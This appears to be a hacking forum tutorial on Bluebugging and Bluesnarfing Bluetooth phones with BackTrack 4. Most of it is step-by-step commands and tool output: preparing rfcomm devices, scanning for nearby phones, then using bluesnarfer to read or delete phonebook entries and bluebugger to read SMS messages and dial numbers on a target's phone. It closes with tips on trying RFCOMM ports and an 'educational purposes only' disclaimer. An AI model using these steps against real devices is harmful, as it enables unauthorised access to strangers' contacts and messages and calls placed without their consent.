Low success rate so you have to keep on trying ..Bluebugger
Bluebugging is a form of bluetooth attack often caused by a lack of awareness. In progression of discovery date to society, bluetooth attacks were first seen with the advent of Bluejacking, followed by Bluesnarfing and Bluebugging.
Bluebugging is best known for attacking the Nokia Phones. This is simply because of it being an earlier model. This phone's installation included a faulty implementation of Bluetooth whichhas since been updated thanks to newer firmware (pinware authentication and/or PIN entry) available to each customer.
This newer firmware does not stop hackers from penetrating these devices.Rather it will only slow them down for a short time period. For the average user personal security (use and protection of one's multiple digit based PIN) and situational awareness can make this tasking much more difficult and force those committing Bluebugging to rely on special hardware and an enormous amount of computing power for success.
You need
BACKTRACK 4Bluesnarfer and Bluebugger commands
Configure Bluetooth device with the following command:
bt ~ # mkdir -p /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
That was for Bluesnarfer and now for bluebugger the following command:
bt ~ # mknod --mode=666 /dev/rfcomm0 c 216 0
Than type the following command:
bt ~ # hciconfig hci0 up
Now the bluetooth adaptor should be ready. Now typew the following command:
bt ~ # hciconfig hci0
You should see somthing like this:
hci0: Type: USB
BD Address: 00:11:22:33:44:55 ACL MTU: 678:8 SCO MTU: 48:10
UP RUNNING
RX bytes:85 acl:0 sco:0 events:9 errors:0
TX bytes:33 acl:0 sco:0 commands:9 errors:0
For scanning other Bluetooth devices type the following command:
bt ~ # hcitool scan hci0
You should see all the devices in the area. You can also use Btscanner and Btscanner has a bruteforce scanner for discovering hidden devices.
Now note the name and MAC of the target and let's move on. First thing lets try to ping are target. Type the following command:
l2ping (target MAC)
Next we need to find out more about the target device so we need blueprint with the following command:
sdptools browse --tree --l2cap (target MAC)
Now type the following command:
bt ~ # bluesnarfer
Now you see something like this:
bluesnarfer version 0.1 -
usage: bluesnarfer [options] [ATCMD] -b bt_addr
ATCMD : valid AT+CMD (GSM EXTENSION)
TYPE : valid phonebook type ..
example : "DC" (dialed call list)
"SM" (SIM phonebook)
"RC" (recevied call list)
"XX" much more
-b bdaddr : bluetooth device address
-C chan : bluetooth rfcomm channel
-c ATCMD : custom action
-r N-M : read phonebook entry N to M
-w N-M : delete phonebook entry N to M
-f name : search "name" in phonebook address
-s TYPE : select phonebook memory storage
-l : list aviable phonebook memory storage
-i : device info
Type the following bluesnatfer command:
bluesnarfer [options] -C 7 -b (taget MAC)
bluesnarfer -r 1-100 -C 7 -b 00:11:22:33:44:55 (example)
Type the following Bluebugger command:
bluebugger -h
Now you should get something like this:
bluebugger 0.1
-----------------------------------------
Usage: bluebugger [OPTIONS] -a (addr) [MODE]
-a (addr) = Bluetooth address of target
Options:
--------
-m (name) = Name to use when connecting (default: '')
-d (device) = Device to use (default: '/dev/rfcomm')
-c (channel) = Channelto use (default: 17)
-n = No device name lookup
-t (timeout) = Timeout in seconds for name lookup (default: 5)
-o (file) = Write output to (file)
Mode:
-----
info = Read Phone Info (default)
phonebook = Read Phonebook (default)
messages = Read SMS Messages (default)
dial (num) = Dial number
ATCMD = Custom Command (e.g. '+GMI')
NOTE: Modes can be combined, e.g. 'info phonebook +GMI'
Now type the following command:
bluebugger [OPTIONS] -c 7 -a (target MAC) [MODE]
bluebugger -m ungli.baba-c 7 -a 00:11:22:33:44:55 dial 0845KIM (example)
And again you should see some results. If after using bluebugger you getoperation already in progress error type:
hciconfig hci0 down
hciconfig hci0 reset
hciconfig hci0 up
Basic Commands:
lsusb detection of the type or device producer
hciconfig hci0 up for bluetooth device activation
hciconfig -a for detection of services about your own device
hcitool scan hci0 for ether scan
sdptool browse bd_addr fingerprint available devicees
Detection of BlueToothe device:
hcitool scan
Configuration discovery and device detection:
hciconfig hci0
Every BlueTooth device has assigned a so called class. The command for finding out the class is:
hciconfig hci0 class
Change of Class device:
hciconfig hci0 class 0×0000
For hcitool or hcidump:
hcitool [options] [command parameters] or hcidump [options] [filter]
RFCOMM PORTS ARE GOLD MINES .. IF YOU PICK RIGHT ONES YOU WOULD PROGRESS WELL.. MANY RFCOMM PORTS MORE THAN 40... SO YOU MUST KEEP ON TRYING .. I HAVENT TRIED IT ON MANY FONES SO I M NOT SURE OF ITS SUCESS RATE ... GOOD LUCKFOR EDUCATIONAL PURPOSES ONLY